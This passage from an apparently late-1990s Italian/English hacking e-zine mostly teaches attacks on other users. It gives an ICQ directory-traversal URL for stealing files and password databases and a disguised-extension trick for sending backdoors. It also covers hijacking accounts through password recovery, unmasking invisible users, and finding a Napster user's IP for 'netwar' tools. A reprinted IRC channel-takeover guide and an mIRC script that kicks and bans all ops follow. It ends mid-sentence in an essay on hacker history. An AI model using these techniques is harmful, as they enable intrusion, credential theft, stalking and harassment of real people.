Se vuoi proteggerti da questa bastardata, usa uno dei cracks per ICQ
che ti permettono di aggiungerti alla tua stessa contact list (Ehi! cosi'
puoi anche vedere se sei online, e magari parlare a te stesso!
Dimenticate questa frase, per piacere :)).
Inotre, raccomando di backuppare il DB spesso.
Falle della ICQ homepage
========================
L'ICQ homepage è una funzione implementata dalla versione 99a build
#1700 di ICQ. Permette di aprire un piccolo webserver sul proprio computer
e metterci un piccolo sito senza bisogno di aluna conoscenza. Ci sarà
anche un counter, e sarai avvertito quando qualcuno visita la tua
homepage. Si possono anche fornire vari file dal proprio computer.
Naturalmene questo sito è visitabile solo quando sei online, a visto che alcune
persone (ndt: beati loro :) hanno connessioni LAN o ADSL o altri tipi di
connessioni che li tengono online 24 su 24, 7 giorni alla settimana,
questa funzione puo' tornare abbastanza utile. Ma giungiamo alla parte
interessante: quanto è sicuro questo piccolo webserver? La ICQ Homepage
inclusa in ICQ99a #1700 e #1701 è vulnerabile a due attacchi enormemente
stupidi.
A) Quando ti ci connetti manualmente (con telnet, NetCat o un altro
programma qualunque) ed inserisci un comando web-server non standard, lui
semplicemente crasha e porta il client ICQ della vittima con se'. Ad
esmpio: il comando get, combinato con un parametro, semplicemente preleva
un determinato file. Se vuoi prelevare un file locato a
http://www.hackersat.xs3.com/filez/pwddiziobill.txt (inutile che proviate,
eh... non c'è questo file sul server... per ora ;-)) semplicemente ti
connetti a www.hackersat.xs3.com sulla porta 80 e scrivi "get
/filez/pwddiziobill.txt" - senza virgolette, come al solito.
Ora, se ti connetti al webserver della ICQ Homepage e semplicemente
scrivi get senza alcun parametro, il webserver crasha insieme all'ICQ
della vittima e ricevi un messaggio di "connessione perduta".
Sulle nuove versioni di ICQ otterrai cmq un messaggio di "connection
lost", ma questa volta è perché il webserver ha semplicemente chiuso la
connessione, non perchè ha crashato o altro.
B) La directory del webserver di ICQ è, se non si cambiano i settaggi
di default all'installazione, c:\program files\icq\homepage\. Qualsiasi
cosa in questa directory puo' essere letta da qualunque web browser (o
magari da telnet, se scegli di navigare con telnet per qualche strano
motivo :)). Ma e se si potesse risalire l'albero delle directory? Cioè,
prima a c:\program files\icq\, poi a c:\ ed alle sue sottodirectory?
Questo puo' essere fatto col webserver di ICQ che arriva con ICQ99a
builds #1700 and #1701. Ad esempio: se vuoi leggere il system.ini di
qualcuno, che si trova in C:\windows\system.ini, avrai bisogno di risalire tre
volte per andare da c:\program files\icq\homepage a c:\, e quindi
scendere da c:\ a c:\windows. Questo puo' essere fatto accedendo al seguente
URL sul webserver della vittima: "/..../windows/system.ini" (ehm...
senza virgolette :)). Ecco spiegato come funziona:
Un punto significa "directory corrente". Due punti significano un
directory in su. Tre stanno per due dir su e quattro, come nel nostro caso,
significano 3 directory in su. Una volta che siamo risaliti di 4
directory e siamo su c:\, scendiamo a c:\windows e quindi arriviamo a
c:\windows\win.ini. Questa regola è universale, ovvero vale per qualunque OS
(o almeno ogni OS che conosca), Windows incluso, che è il sistema
operativo dove gira il webserver di ICQ.
Ora, un attimo... inseriamo questo URL, ma riceviamo un errore 304.
Cio' accade perchè questo webserver ci permette solo di accedere a pagine
.html, file .jpg .gif o altri files che possono essere trovati
normalmente in un sito. E' molto semplice fregare questo stupido webserver.
Basta inserire questo URL: "/..../.html/windows/system.ini". E' banale,
vero? Puoi anchee scaricare il DB della vittima per usarli in seguito per
trovare la sua password (vedi il capitolo sul password stealing). Il
colmo? Per scaricare i files puoi usare anche un download manager, come
GetRight o Go!Zilla, dato che il web server di ICQ supporta il resume!
NB: per fortuna - o purtroppo, a seconda dei punti di vista :)- le
nuove versioni della ICQ Homepage non sono piu' vulnerabili a questo buco.
NB2: /../../../ è la stessa cosa di .... (risalire tre volte).
Trucco per la funzione di trasferimento file di ICQ
===================================================
Quando ricevi una richiesta di file transfer da qualcuno, puoi vedere
il nome del file in una piccola casella di testo all'interno della
finestra di dialogo della richiesta. Ma cosa succede se il nome del file è
troppo lungo per essere mostrato? Facciamo una prova. Prendi un file
eseguibile chiamato "file.exe" (NO, NON IL SERVER DI NETBUS! :)) e cambia
il suo nome in "file.jpg .exe" (sempre senza
virgolette, naturalmente). Manda wuesto file a qualcuno su ICQ. Visto che
il nome del file è troppo lungo per essere mostrato, la piccola text box
mostra solo quello che puo', nascondendo la parte " .exe" agli
occhi della vittima. Il destinatario riceverà il file senza pensarci due
volte (cioè, è solo un'innocente immagine .jpg! ;-)) e magari lo
eseguira' direttamente... praticamente si puo' preparare, *ad esempio*, un
server di backdoor dandogli anche l'icona di un file di testo e
rinominandolo come "sex-story.txt exe".
Quindi, la prossima volta che ricevi un file da qualcuno su ICQ,
pensaci due volte prima di aprirlo... ;)
Smascherare gli utenti invisibili
=================================
ICQ ha una funzione chiamata "invisible list". Chiunque tu inserisci in
questa lista non potra' vedere se sei offline o online, anche se sei
nella sua contact list.
Se qualcuno ti mette nella invisible list e vuoi vedere se è online o
offline, basta fare cosi':
(a) Trova il suo UIN (supponiamo sia 5917057).
(b) Vai a www.icq.com/5917057
(c) Cerca una piccola immagine che dice se è online o offline.
Cos'è questa cosa, chiederai? E' un opzione chiamata web aware.
Permette a persone che non hanno ICQ di vedere se sei online o offline. E'
anche necessaria per i "web pagers" di ICQ (del codice che piazzato in un
documento html permette a chiunque di mandarti un messaggio su ICQ o di
vedere se sei online o offline, senza la necessità del client ICQ).
L'opzione web-aware puo' essere settata ad off usando il menu' delle
preferenze. Se lo fai, le persone che andranno su www.icq.com/TUOUIN
vedranno un immagine con scritto "disabled" al posto di "online" o
"offline".
Anche se la tua vittima setta ad off il web-aware, puoi sempre fare in
modo da svelare la sua presenza online.
Ad esempio: di solito basta provocare qualcuno con insulti e simili per
vedersi rispondere.
Inoltre, puoi registrare un altro utente ICQ (ci vogliono 5 minuti), in
aggiunta a quello "regolare", e quindi passare a quello e aggiungere
questa persona. Non comunicare con questa persona mentre usi quest'altro
account. Probabilmente si dimenticherà presto di questo "utente
silenzioso" e non perderà tempo a metterlo nella invisible list. Fatto cio',
potrai poi passare all'altro utente quando vorrai e vedere se la vittima
è online o meno...
Scoprire passwords
==================
Se ti trovi ad aver i files del DB di qualcuno, puoi facilmente
scoprire la sua password. Le passwords sono in chiaro nei file .dat (ndT:
nella versione 2000, invece, mi sebrano criptate :(( - cmq ci sono
sicuramente tools che le decriptano, provate a cercare su astalavista o piu' in
la' nella sezione filez del sito).
In piu', alcune persone scrivono falsi indirizzi e-mail nelle loro
info, come fuck-off@hotmail.com, fake@not.real.com ecc.. Nel primo caso
(fuck-off@hotmail.com), puoi provare a vedere se fuck-off@hotmail.com
appartiene a qualcuno. In caso non appartenga a nessuno, registralo e poi
vai a www.icq.com e cerca il link "forgot your password?". Inserisci
l'UIN della vittima, e la password sarà mandata al "suo" indirizzo Email
(fuck-off@hotmail.com). Poi, accedi al tuo account di hotmail e attendi
la password nella tua inbox... ;-)
Ecco un altro esempio: la vittima inserisce fake@pentagon.com come suo
indirizzo Email. Fortunatamente non ha scritto pentagon.gov, perché
pentagon.com sta distribuendo indirizzi email gratuiti (per quanto ne so).
Basta registrare fake@pentagon.com e prendere la sua password.
Se la tua vittima scriva qualcosa come: fake@not.real.com, puoi sempre
registrare real.com per 70$, registrare il subdomain not.real.com,
installarci un POP3 mail server e registrare l'account "fake"! Non è una
soluzione semplicissima e probabilmente nessuno farebbe nulla del genere
per avere la password di ICQ di qualcuno, ma....
In piu', puoi sempre provare a indovinare/forzare la password, anche se
puo' volerci tempo. Avete notato che la lunghezza massima di una
password di ICQ è 8 caratteri? Perchè è una cosa interessante? Qualche tempo
fa, nel 1997, potevi usare un clone Linux di ICQ (la Mirabilis non ha
rilasciato una versione ufficiale di ICQ per Linux, quindi l'unico modo
per usare ICQ sotto Linux è usare un suo clone, cioè un programma che
usa il protocollo di ICQ e offre le funzioni di ICQ, ma non è una
release ufficiale) per accedere agli accounts di qualcuno senza bisongo di
password. Come? Alcuni cloni di ICQ per Linux non obbligavano l'utente ad
avere una password di piu' di 8 caratteri. Ma se provavi a fare il
login come qualcun altro ed inserivi una password piu' lunga di 8
caratteri, saresti incappato in un buffer overflow che avrebbe fatto
semplicemente saltare la verifica della password.
Un buffer overflow, in breve, avviene quando un programma assegna ad
una certa cosa una determinata area di memoria e si fa eccedere la
dimensione di quella cosa oltre quel limite di memoria assegnato. Puo'
succedere di tutto, e in questo caso fanno semplicemente saltare la fase di
verifica della password.
Comunque, questa falla è stata riparata. Peccato ;)))
Note Finali
===========
Usarlo o non usarlo?
--------------------
C'è molta gente che non usa ICQ o altri instant messanger per motivi di
sicurezza. Puoi anche evitare di usare la posta elettronica per evitare
il mailbombing o allegati potenzialmente dannosi, rifiutare di navigare
sul web per la paura di giungere su una pagina ostile, non andare mai
su IRC per paura di essere nukati ecc.
Io non credo che la soluzione migliore sia semplicemente "evitare". Se
sei di fronte ad un problema di sicurezza documentati e fai del tuo
meglio per metterti al sicuro.
Spero che, ad esempio, userai le informanzioni che hai ottenuto da
questo documento per mettere piu' al sicuro possibile il tuo client ICQ,
non che impaurito pensando a quello che potrebbero farti corri a
disinstallare ICQ.
Far girare ICQ sotto Linux
--------------------------
ICQ per Windows 3.11, ICQ per Windows 9x, ICQ per Windows NT, ICQ per
Mac, ICQ per Java... cosa? Niente ICQ per Linux?
Una versione di ICQ per Linux era stata annunciata, ma non è mai
arrivata.
Come mai? Forse la Mirabilis non è riuscita a convertire ICQ per Linux?
:)
In tutti i modi, se vuoi usare ICQ sotto Linux, puoi
A) Scaricare ICQ per Java, ed una Java Virtual Machine per Linux.
Lancia la JVM e facci girare ICQ per Java.
B) Vai a www.linuxberg.com, nella pagina "software", trova la pagina di
ICQ e troverai una lista di cloni di ICQ per Linux.
A proposito delle "Catene di S.Antonio" di ICQ
----------------------------------------------
Aggiungo una nota divertente a riguardo delle stressanti catene di
messaggi d ICQ... credo sia inutile dire che sono tutte cazzate, non ho mai
forwardato nessuno dei messaggi minacciosi che periodicamente si
ricevono da chi non ha nulla da fare tramite ICQ, ma sono ancora vivo :)))
Se poi vuoi farti una risata alle spalle di chi ti ha inviato il
messaggio, potresti mandargli una cosa del genere:
Questa è una catena di messaggi di ICQ. Non fermare la catena!
Cindy di Sydney ha mandato questa lettera a 49 milioni di persone ed è
diventata la regina dello Zaire!
Masha dalla Russia ha forwardato questo messaggio a 23.7 milioni di
persone, ed è andata sulla luna come astronauta!
Gil dal Brasile non ha forwardato questa lettera e si è trasformato in
una rana!!
Chan dal Giappone ha forwardato questa lettera a 107000 persone ed è
diventato il campione mondiale di Pokemon e PacMan!!!
Se forwardi questa lettera 1-5 volte: 1-5 persone se la prenderanno con
te per avergli mandato questa stupida lettera!
Se forwardi questa lettera 6-10 volte: 6-10 persone se la prenderanno
con te per avergli mandato questa stupida lettera!
Se forwardi questa lettera 11-15 volte: 11-15 persone se la prenderanno
con te per avergli mandato questa stupida lettera!
Se forwardi questa lettera 16-20 volte: 16-20 persone se la prenderanno
con te per avergli mandato questa stupida catena!
Ci voleva una cosa stupida in una guida seria, no?
No? Ok, la prossima volta non ne inserisco :)
Appendice A: Trovare quella piccola porta da solo
=================================================
Si'. Puoi trovare la porta di ICQ da solo, piu' velocemente che usando
qualsiasi tool e con maggiore soddisfazione personale :).
Come? Semplice. Ricordate il modo per ottenere l'IP su ICQ? Ottenere la
porta è praticamente la stessa cosa. Una volta che hai trovato l'IP hai
anche la porta affianco. Le connessioni, con Netstat sono mostrate dal
loro IP, la porta locale e la porta remota, quindi devi solo trovare
l'IP del tuo obiettivo. Vedrai:
suo-IP:la-porta. Basta guadare dopo i ":" ed ecco la porta.
C'è anche un modo piu' semplice per fare cio'. Leggi l'appendice B per
sapere qual è
Ringraziamenti a Zero Alpha per l'idea di questo trucco.
Appendice B: I vantaggi dei cloni Unix di ICQ
=============================================
I cloni di ICQ hanno solitamente meno fuzioni della release ufficiale,
ma a volte hanno delle nuove funzioni come un'opzione del menu che
aggiorna tutte le info dei tuoi contatti, un bottone che cerca un altro
server vicino se non riesci a connetterti a quello che usi normalmente
ecc.
Inoltre, la maggior parte degli ICQ mostrerà l'IP e la porta del
contatto in un nuovo campo della pagina info, ti permetterà di aggiungere
utenti senza bisogno di autorizzazione e senza avvertirli che sono stati
aggiunti. Alcuni cloni, poi, hanno anche uno spoofer incorporato!
Appendice C: conversione IP ==> UIN da te stesso
================================================
Supponi che qualche lamer ha appena provato a nukarti. Il tuo firewall
ha fermato il DoS. Tu vuoi chattare con l'idiota per dirgli quanto è
stupido... ma hai solo il suo IP (nel log del firewall, naturalmente).
Nessun problema: se il lamer ha ICQ puoi avere il suo UIN abbastanza
facilmente.
Ci sono infinite ragioni per le quali vorresti sapere come convertire
l'IP in UIN. Vediamo come fare.
Questo trucchetto è abbastanza semplice. Prima di tutto, prendi un
message spoofer. Poi, settalo con l'IP dell'obiettivo, e manda un messaggio
col tuo IP come sorgente. Ad esempio, se il tuo UIN è 5917057, devi
spoofare il messaggio da quell'UIN. Nel messaggio, dovresti inserire
qualcosa che venga risposta di sicuro. Puo' essere qualcosa di offensivo, o
qualcosa di interessante... magari un "Ehi, ho una sorpresa per te..."
. Ora supponi che l'obiettivo risponda al tuo messaggio, Dove credi che
arrivi la risposta? A te, naturalmente! E' il tuo UIN quello che hai
usato come sorgente per lo spoofing, no?
Ora che hai ricevuto il messaggio dalla tua vittima, hai anche il suo
UIN ;)
Appendice D: Divertirsi con le contact list
===========================================
Come già scritto, se a qualcuno fai aggiungere se stesso in lista,
perderà la sua contact list a meno che abbia la patch contro questo buco.
Ho già spiegato come farlo con uno spoofer, ora vediamo un altro modo.
Prima di tutto, devi avere questa persona nella tua contact list. Poi,
cambia il suo nome nella contact list e mandagli il contatto. Gli
apparirà come un'altra persona, e se accetta il contact è fregato, poichè
avra effettivamene aggiunto se' stesso in lista.
Per proteggert da questi espedienti, installa la patch che ti permette
di aggiungere te stesso in lista - o stai attento ai contact che ti
mandano :)
La persona che ha tirato fuori questo trucco è Dr. Virus.
Appendice E: Trucchi incredibili col protocollo di ICQ
======================================================
Immagina di poter entrare in una conversazione fra altri utenti senza
permessi, di poter ottenere IP, porta e tante altre informazioni in
pochi secondi... tutto il potere sul sistema che potresti desiderare...
puoi ottenerlo imparando il protocollo di ICQ. Possono farlo anche altri,
e usare quella conoscenza contro di te. Non farti cogliere impreparato
;)
Impara qui il protocollo di ICQ:
http://www.student.nada.kth.se/~d95-mih/icq/
Prova dei programmi che possono mostrare cosa puoi fare e poi vai alla
fonte...
http://www.hackology.com/~ewitness/
Fine... per ora.
Ghent...
WAR ON NAPSTER
Sollecitato dalla sezione "Trucchetti" edita da "Syn^" vorrei donare il mio piccolo contributo.
I due più famosi servers per "chattare" sono indubbiamente IRC e ICQ.
Ma sicuramente da due anni a questa parte molti di voi si saranno imbattutti,
in un Server che unisce l'utile al dilettevole: Napster.
E altrettanto sicuramente, molti di voi avranno subito i soliti attacchi presenti anche su IRC e ICQ.
I programmi di netwar sono ormai risaputi, e analizzati esaurientemente in uno dei capitoli editi,
ma potra' forse risultare oscuro, come trovare l'IP del simpaticone (la vittima).
Beh, seguite i miei consigli:
1- Aggiungete il simpaticone nella "Hotlist", clikkando con il destro sul suo nome,
2- Andate su "Hotlist", selezionate la vittima; compariranno le canzoni da lui possedute.
3- Fate doppio click su una di esse e scaricatela,
4- Una volta iniziato il downloading, aprite una finestra DOS,
5- digitate: netstat -n
6- compariranno 2 colonne di indirizzi IP: quella a sinistra mostra il vostro, quella a destra mostra l'IP della vittima,
7- scegliete l'ultimo IP in basso (della vittima), che dovrebbe avere a fianco la scritta ESTABILISHED.
8- A questo punto aprite un qualsiasi programma di netwar che richieda l'IP e divertitevi (o vendicatevi).
Nota: Può capitare che ESTABILISHED non compaia, ma ci sia al suo posto un altro messaggio, in quel caso decifrare il messaggio e scegliere il provvedimento più opportuno.
(Es. TIMEWAIT)
Questo scritto è il contributo di "Anomalia" che potete trovare su mIRC (#italiahelp #Arese)
Ringrazio "Syn^".
_____________________________ __________________________
HACKING IRC - THE DEFINITIVE GUIDE
Copyright 1996 klider@panix.com
Welcome to Hacking IRC- The Definitive Guide.
The purpose of this page if you have not already guessed is to provide
what I consider optimal methodology for hacking IRC channels. In addition,
I provide some of the better channels to hack as well as fun things to do while "owning a channel."
Contents
* Section 1-- Why Hack IRC?
* Section 2--Requisite Tools
* Section 3--What It Takes To Gain Control
* Section 4--Link Looker(LL)
* Section 5--Bots and Scripts
* Section 6--Multi-Collide-Bot(MCB)
* Section 7--Pre-Takeover Preparation
* Section 8--Thing To Do ONce You "Own" the Channel
* Section 9--Best Channels to Hack
[Image] See me if you dare.
Section 1-Why Hack IRC?
I have often asked myself this question and the answers are varied and numerous.
One of the primary reasons for hacking IRC channels is due to shear boredom.
However a multitude of secondary reasons exist. Foremost among these is the
"that asshole op i nsulted me and/or kicked me and/or banned me from the channel
and I WANT REVENGE! This is a perfectly valid excuse and boredom is not a necessary
condition for implementing a takeover of an IRC channel. Nor is it a necessary condition
that the reason yo u were insulted and/or kicked and/or banned was because in fact you
are an asshole. All that is necessary is the will, the desire, a bit of skill, and of
course the tools, which convieniently brings me to my next section.
Section 2-Requisite Tools
Any decent craftsmen needs a good set of tools and IRC hackers are no exception.
Without the proper tools you are dead in the water. All of the tools I describe
below are available on public ftp sites. Before I launch into a discussion of what
you wil l need, it is important to point out that if you are reading this document
from your ppp/slip account you might consider geeting a shell account if you are
serious about hackin. Hacking IRC from a slip/ppp is much more complicated than
doing so from a sh ell account. There are those who will debate this but my
experience has shown that mIRC or any of the other shareware IRC programs for
the PC are no match for the speed and ease of use that an IRC shell script
allows for. Thus the first tool required fo r hacking is an excellent irc shell
script. If you have already used IRC via a shell account and are still reading
this document you probably already have a script, which means you are well on
your way! As far as IRC shell scripts go, my personal favor ite is Lice - again
available publically via ftpFTP. Other scripts exist but the richness and power
of the LICE commands I believe is second to none. Now while it is possible to stop
here and hack ops with just a script, you would effectively be putting yourself
needlessly at a handicap. Therefore I reccommend these additional two tools:
1)Multi-Collide-Bot(MCB) and 2)LInk Looker(LL). These two C programs are your
infantry and intellige nce respectively. Again both are available via FTP and
both are C programs and therefore need to be compiled.
Section 3 - What It Takes To Gain Control
Without going into much detail clearly in order to effectively gain control
of an IRC channel you must be the only op on your channel. If you are still
clueless at this point, that is to say..You should be the only guy/gal with
the @ in front of your nic k. Once you have accomplished this, the channel
is YOURS. Of course, that is until it is taken back or you decide to cease
hacking the channel. There are a number of ways to effectively gain ops on
a channel and I will start with the simplest, then mov e to the increasingly
more complex and finesse laden methods. By far and away the easiet method of
gaining ops on a channel is to ask. You laugh eh? Well don't. Clearly as
hackers grow more prevelant on IRC the asking method becomes more and more
unlikely to succeed. This is especially true of the bigger and well established
channels that have cultures onto themselves such as #Netsex, #Teensex,
#Windows95, #Bawel, #BDSM, #Blaklife, #Texas, #Hack, and any of the #Warez
channels and a whole host of others. To gain ops in these channels you must
become a channel re gular (i.e. one that hangs there freqently and becomes a
known and trusted member of the channel). Since you have neither the time nor
the desire to make friends on the channel you ultimately want to hack ops on,
the asking method is the last thing you want to do on all but the smaller more
ethereal channels, where you obviously stand a better although still slim chance
of gaining ops through a request.. One important exception to the ask method is
through the use of anonirc which can be used on any ch annel but has severe
limitations..more on this later. But of course you didn't come this far to be
taught how to ask for ops..so lets proceed with the next lesson. Aside from
asking there are essentially two other ways of gaining ops. The first is through
splits and the second is through anonirc. The following discussion mostly relates
to splits but I will touch on anonirc briefly at the end. What is a split?
A split occurs when the IRC server you are communicating on detaches from the rest
of the net. If you are in a channel and by chance the only one on a particular
server that splits away, you will not only find yourself alone on the channel,
but will now ha ve the opportunity to gain ops. In order to do this you need to
leave and rejoin the
channel in which case you will now find yourself with the
little @ in front of your nick. When your server rejoins you will have ops on
the channel. Now you say, "Wow, thats easy enough". Wrong. More likely than
not, especially on a bigger channel a number of things are likely to occur
that will remove your op status. Remember now the goal here is to keep ops so
you can "Have Your Way". Also and more importantly, if you go into a channel
and wait around hoping the server you are on splits, you might grow old and die
first. Therefore, what is a wannbe IRC hacker to do? Link Looker is your answer.
Section 4 - Link Looker
Link Looker is a lovely little program that acts as your intelligence officer.
Without getting into the complexities or its mechanics, what it effectively
does is to give your a message anyti me a particular server detaches from the net and
a message when it rejoins. Is the methodology becoming clearer now? Yes! Thats right!
When LL tells you that a server is split ,you connect to that server and join the channel
you seek to hack ops on and h ope nobody else split from the channel on that
server(if this occurs you will not get ops).. If you find yourself alone, you
will have ops and a fighting chance to gain control of the channel. It is important
to realize that on many channels, just getti ng ops via a split and waiting for a
rejoin is sufficient for gaining control of a channel. This is particularly true of
small to medium sized channels as well as channels that are not organized or do not
have Bots (more on this later), You simply wait for the server to rejoin and once
the channel is full you execute your mass deop command (this is on your script and
the key element in getting rid of any other ops) and you will be the only op left.
The channel is yours and go do your thing! On bigger more organized channels, things
won't be so easy due to the presense of Bots as well as the presense of scripts used
by existing human ops.
Section 5 - Bots and Scripts
Bigger more organized channels inevitably have a Bot(Robot) or multiple Bots.
Bots are essentially suped up scripts that attempt to maintain ops on a channel
by their continuous presensce on channel. Additionally Bots provide a number of
channel mainten ance tasks such as opping known members of the channel
(either automatically or through password requests), providing notes,
and other information. Bots however are primarlly used for keeping ops on channel
and depending on the type of Bot, defending aga inst IRC hackers. Bots come in many
varieties and types but the best of them do a good job of deoping spliters(thats
you silly..you are opped on a split and when you rejoin the bot will deop you). Not
only will Bots deop you..many of the human ops have scripts (such as LIce) that
depending on the settings employed will deop you as well. Now with the prevalance
of powerful scripts on IRC a recent phenomona is the occurse of the desynch. This
is a nasty event that takes place when you rejoin from a spli t and your script
deops the existing ops and the existing ops deop you at the same time. What this
does is confuse the shit out of the servers and cause them to desynchronize from
one another. This is to be avoided at all costs. When this happens you will
effectively become desynched from a large portion of the net and most the
channel, (depending on what server you rode in on). What's worse is that you will think
you have ops( which you will for that server) but in reality you won't and you will
be w asting your time. So how with the prevalence of super Bots and Human ops with
scripts do you take the channel? Using MCB of course!
Section 6 - Multi-Collide-Bot(MCB)
Multi-Collide-Bot (MCB) is a powerful tool and your best friend. MCB is an even
lovelier program that creates a clone of a nick you want to kill (almsot always
an op on the channel you are tr ying to hack) on a server that has split(yes the
one Link Looker informed you of). Basically you feed MCB the name or names of the
nick you want to kill and tell it what split server to establish those clones and
upon rejoin.BAM/SMACK/KIILL!! Yes thats r ight, the target is thrown out of the
channel(losing ops) and must re-establish a connection with a server to get back
onto IRC and into the channel. So yes, you have figured it out. If you kill all of
the ops on a channel and you ride in on a split you will be the only op in the
channel. Let me assure you there is nothing like seeing the nick kill messages
of the ops you have targeted as you ride in on the split.
Section 7 - Pre-Takeover Preparation
There are a number of things you can do before you attempt to take over an
IRC Channel to make things easier and be as well prepared as you can possibly be.
1)Pre-Attack Observation. Plain and simple you must know who you are attacking.
One of the most important things you can do as you sit and observe the channel
is to determine which bots and/or human ops are deopping on rejoins. These are
the nicks you want to target first. You will fail if you don't kill these nicks
and rejoin because you are lik ely to cause a desynch(discussed above). However,
it is essential to make sure you kill all of the ops. Leaving just one op alive
means you have lost that battle and must now regroup and wait for another split.
It is important to watch out for ops chan ging their nicks if they detect a split.
If they do this, the mcb you tagged with their nick will be useless to you. The
way I prevent this is to be on both sides of the split. That is to be opped in the
channel on the split server and have a clone in the channel on the other side of the
split monitoring the goings on, telling you if ops change nicks or new people are
opped (in which case you create a new mcb with their name on it).
Section 8 - Things To Do Once You "Own" the Channel
Once you own the channel, the decision is clearly yours on how you want
to proceed and needless to say the number of things you can do is endless.
However, let me share with you a number of time tested ideas that are sure
to give you a thrill not to ment ion totally piss of the channel you have now
hacked. The first thing you can do is to taunt the former ops of the channel.
That is to say, they will probably be cursing you and telling you what a loser
you are for hacking the channel. They will say thi ngs like "get a life, do
something more productive". Remember don't take it personally. You have to keep
in mind that it is the formers ops who in fact are the ones who need to get a
life, considering the only power they have or make that had (if you su ccessfully hacked
the channel) was to have ops in the first place. So you can continue to taunt and if
they get relay billegerent you can kick them off the channel. They will undoubtedly come
back within a second or two and then you can say something li ke, "Now, now I am in control
of the channel and I will not tolerate such language and behavior. If you are
unable to control yourself I will be forced to ban you." Now this is sure to
get some violent response from the former op in which case you subse quently
kick and ban them and move onto the next person. Another thing I like to do is to word ban.
This is particularly easy if you have LICE. What you do is pick a word that if typed onto
the screen by any of the channel members, will automatically r esult in you kicking them off
the channel with the reason that word is banned. This method is particularly good in channels
like #teensex where people are always saying the word sex, male, female, teen, age, etc.
All you do is ban those words and watch the kicks begin to fly. Another thing I like to do
is moderate the channel. What this does with the /mode +m command is to make it such that
nobody on channel can speak. This is a particularly good thing to do when many of the
channel members are getti ng out of hand and you want to make some sort of statement without
anybody interrupting you. Yes all eyes will be trained on you. If you want to be really
mean, when you are finished hacking the channel, you can leave it moderated in which case
nobody w ill be able to speak and the channel is effectively shut down. Other things to do
which are nasty as well are to kick everybody out of the channel and make it
invite only, effectively shutting it down as well. Think of your own creative things to
do. I would love to hear about them..email me..if they are particularly interesting I
will include them in this page with an attribution if you like.
Section 9 - Best Channels to Hack
#limbaugh #rush #lamerz #newbies
email klider@panix.com
Piccola aggiunta:
Hola raga sono io, per il takeover, non vi scomodate a scriverlo ve lo do' io.
Sbattetelo negli Aliases, il comando è /take , Naturalmente dovete avere l'op!!
Buon takkaggio e attenzione, levate tutti i vostri identificativi prima di farlo!!
_________________________________INIZIO CODICE_______________________________
take {
if $me !isop $chan { echo -a *** Non sei op | halt }
else {
mode $chan +i
set %iozzo 1
set %iozzo.opnick $nick($chan,0,o)
if %iozzo.opnick == $null { echo -a *** Non ci sono ops! | goto end }
:next
if %iozzo <= %iozzo.opnick {
if $nick($chan,%iozzo,o) == $me { inc %iozzo | goto next }
else {
kick $chan $nick($chan,%iozzo,o) Take
ban $chan $nick($chan,%iozzo,o) 2
mode $chan +i
inc %iozzo
goto next
}
}
:end
mode $chan +i
unset %iozzo.*
}
}
_________________________________FINE CODICE E ARTICOLO_______________________________
HACKERS versione 0.3d
INDICE
1. INTRODUZIONE
2. IN ORIGINE
3. HACKER = CRACKER ?
4. ESISTE UNA ORGANIZZAZIONE?
5. CYBERPUNKS
6. MANIFESTO
7. ALTRI LINK UTILI
A. INTRODUZIONE A GNU
B. LICENZA D'USO
C. BIBLIOGRAFIA
1. INTRODUZIONE
"Hackers." Questa parola assume significati differenti in funzione delle persone a cui lo chiedi.
Al CERT, il Computer Emergency Response Team della Carnegie Mellon University di Pittsburgh (http://www.cert.org/), potrebbero dire
che un hacker e' colui che penetra nei computer altrui. Nello stesso tempo - pero' - Richard Stallman, fondatore della Free Software
Foundation (http://www.fsf.org/), si definisce un hacker. Per lui "hacking" significa sviluppare software in un "open, collaborative
environment", con un forte senso etico per cio' che e' giusto o sbagliato (informaticamente parlando). Usando questa accezione il New
Hacker's Dictionary di Eric S. Raymond (http://www.tuxedo.org/~esr/jargon/html/index.html) definisce un hacker come qualcuno che
ama esplorare le possibilita' offerte da un sistema informativo e mettere alla prova le sue capacita', in contrapposizione con la maggior
parte degli utenti che preferisce apprendere solo lo stretto indispensabile.
Una nota rivista underground recita Hacking, hackers, hack-- in qualsiasi forma, non sono altro che i test di Rorschach del cyberspazio
quelloche pensate significhi il termine hacker rivela tanto di voi quanto degli hacker stessi.
Gli hackers sono buoni?
Sono cattivi? Tutto dipende dalla accezione del termine che volete usare..
Altre definizioni largamente usate sono
Hack
L'arte di fare qualcosa quando non vi e' alcun modo noto per farla.
L'arte di fare qualcosa che non puo' essere fatta.
L'arte di fare qualcosa che e' completamente totally against the odds.
Hacker
Colui che riesce a farcela contro ogni probabilita'..
Colui che riesce a trovare IL MODO in un gioco che non puo' essere vinto.
Colui che insegna agli altri e che diffonde il sapere anche quando nessuno vuole ascoltarlo.
Colui che non molla.
Colui che affronta i propri avversari anche quando lo superano per numero.
Questo documento - che si sviluppa su un paragrafo della Guida ad Internet e alla Realta' Virtuale dello stesso autore - cerca di chiarire
il significato piu' esteso di questi termini.
2. IN ORIGINE
Il termine Hacker definiva in origine i maghi del computer, programmatori in grado di risolvere ogni problema programmatori e
progettisti di computer che considerano l'informatica come la cosa più importante al mondo. Nel parlare con questi esploratori digitali,
da quelli che negli anni cinquanta, domarono macchine da decine di milioni di dollari, fino ai giovani maghi contemporanei che
dominano le proprie macchine nelle loro camerette di periferia, si scopre un elemento comune, una filosofia condivisa che pare legata
al flusso elegante della logica dello stesso computer. E' una filosofia di socializzazione, di apertura, di decentralizzazione e del mettere
le mani sulle macchine a qualunque costo, per migliorarle e per migliorare il mondo. Come racconta Steven Levy nel suo libro HACKERS
(che consiglio caldamente), tutto e' iniziato grazie ai trenini elettrici. Verso la fine degli anni 50, infatti, un gruppo di studenti del MIT
fondo' il Tech Model Railroad Club (TMRC). Si trattava di un club di appassionati di modellismo che pero' non si limitavano a costruire
locomotive e vagoni, ma anche di farli funzionare su una rete ferroviaria in miniatura, perfettemente riprodotta. La complessita' del
sistema poneva agli studenti problemi sempre piu' complessi trovare i pezzi, far funzionare insieme apparecchiature che non avevano
niente in comune. Queste stesse persone, appassionate di tecnologia, utilizzarono lo stesso approccio nei confronti dei primi
(supercostosi) computer che le universita' misero a disposizione.
Con un background di questo tipo fu naturale che le cose presero una certa piega....
A questa prima generazione di hackers animata dal motto INFORMATION WANTS TO BE FREE e dalla convinzione che la tecnologia
dovesse essere diffusa in ogni ambito segui' quella dei cosidetti homebrewer - appassionati di hardware il cui obbiettivo era provocare
lo sviluppo dell'informatica rendendo libere le architetture delle macchine e le specifiche tecniche per realizzarle. A questo mondo
appartiene Wozniak - inventore del primo computer della Apple.
3. HACKER = CRACKER ?
Oggi spesso il termine hacker viene utilizzato con un significato negativo. Gli hackers, infatti sono anche i pirati cibernetici che entrano
